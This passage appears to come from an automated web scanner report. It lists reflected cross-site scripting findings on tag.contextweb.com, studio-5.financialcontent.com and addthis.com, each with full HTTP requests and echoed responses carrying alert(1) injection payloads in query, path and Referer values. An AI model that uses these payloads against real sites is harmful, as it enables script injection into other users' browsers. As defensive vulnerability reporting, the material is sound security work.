GET /hearst?Account=timesunion&Module=markets&Output=JS&c1b85'-alert(1)-'f5875b9d399=1 HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:20 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 17 Sep 2011 16:23:20 GMT
Expires: Sat, 17 Sep 2011 16:24:20 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 28444

document.write('\n');
document.write('<style>\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fc * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n');
do
...[SNIP]...
ancialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fhearst%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dtimesunion%26Module%3Dmarkets%26Output%3DJS%26c1b85'-alert(1)-'f5875b9d399%3D1&Type=widget&Client=hearst.timesunion&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=doc
...[SNIP]...
4.308. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab8c2"%3balert(1)//71fd067c75c was submitted in the action parameter. This input was echoed as ab8c2";alert(1)//71fd067c75c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADab8c2"%3balert(1)//71fd067c75c&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:09 GMT
Content-Length: 8853
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:49 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWADab8c2";alert(1)//71fd067c75c";var cr="200";var cw="728";var ch="90";var cads="0";var cp="530930";var ct="90495";var cf="728X90";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toL
...[SNIP]...
4.309. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cb4e"%3balert(1)//c890eb68e8d was submitted in the cwadformat parameter. This input was echoed as 8cb4e";alert(1)//c890eb68e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X908cb4e"%3balert(1)//c890eb68e8d&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:06:30 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:13 GMT
Content-Length: 8881
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:53 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X908cb4e";alert(1)//c890eb68e8d";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="530930";var ct="90495";var cf="728X908cb4e";alert(1)//c890eb68e8d";var cn="1";var epid="";var esid="";

       String.prototype.c
...[SNIP]...
4.310. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be25e"%3balert(1)//82e6439e0d4 was submitted in the cwheight parameter. This input was echoed as be25e";alert(1)//82e6439e0d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=be25e"%3balert(1)//82e6439e0d4&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:17:03 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:21 GMT
Content-Length: 8851
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:00 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="be25e";alert(1)//82e6439e0d4";var cads="0";var cp="530930";var ct="90495";var cf="728X90";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) !=
...[SNIP]...
4.311. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ddfb"%3balert(1)//3dbf2e046d2 was submitted in the cwpid parameter. This input was echoed as 7ddfb";alert(1)//3dbf2e046d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=5309307ddfb"%3balert(1)//3dbf2e046d2&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:15 GMT
Content-Length: 8881
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:55 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="5309307ddfb";alert(1)//3dbf2e046d2";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="5309307ddfb";alert(1)//3dbf2e046d2";var ct="90495";var cf="728X90";var cn="1";va
...[SNIP]...
4.312. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94662"%3balert(1)//01d7cb85f8 was submitted in the cwpnet parameter. This input was echoed as 94662";alert(1)//01d7cb85f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=194662"%3balert(1)//01d7cb85f8&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:18:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:24 GMT
Content-Length: 8852
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:04 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="530930";var ct="90495";var cf="728X90";var cn="194662";alert(1)//01d7cb85f8";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...
4.313. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f57b6"%3balert(1)//58030263b53 was submitted in the cwrun parameter. This input was echoed as f57b6";alert(1)//58030263b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200f57b6"%3balert(1)//58030263b53&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:04:17 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8853
Date: Sat, 17 Sep 2011 17:04:11 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:51 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200f57b6";alert(1)//58030263b53";var cw="728";var ch="90";var cads="0";var cp="530930";var ct="90495";var cf="728X90";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().in
...[SNIP]...
4.314. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30070"%3balert(1)//af051675e44 was submitted in the cwtagid parameter. This input was echoed as 30070";alert(1)//af051675e44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=9049530070"%3balert(1)//af051675e44 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Thu, 15 Sep 02011 17:21:08 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:26 GMT
Content-Length: 8881
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:51:06 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="9049530070";alert(1)//af051675e44";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="530930";var ct="9049530070";alert(1)//af051675e44";var cf="728X90";var cn="1";var epid="";var esid="
...[SNIP]...
4.315. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d53"%3balert(1)//51c4ba767cf was submitted in the cwwidth parameter. This input was echoed as 48d53";alert(1)//51c4ba767cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=72848d53"%3balert(1)//51c4ba767cf&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:09:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 17:04:18 GMT
Content-Length: 8853
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:58 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="72848d53";alert(1)//51c4ba767cf";var ch="90";var cads="0";var cp="530930";var ct="90495";var cf="728X90";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLow
...[SNIP]...
4.316. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46704"-alert(1)-"69f100acbbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api46704"-alert(1)-"69f100acbbe/nai/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
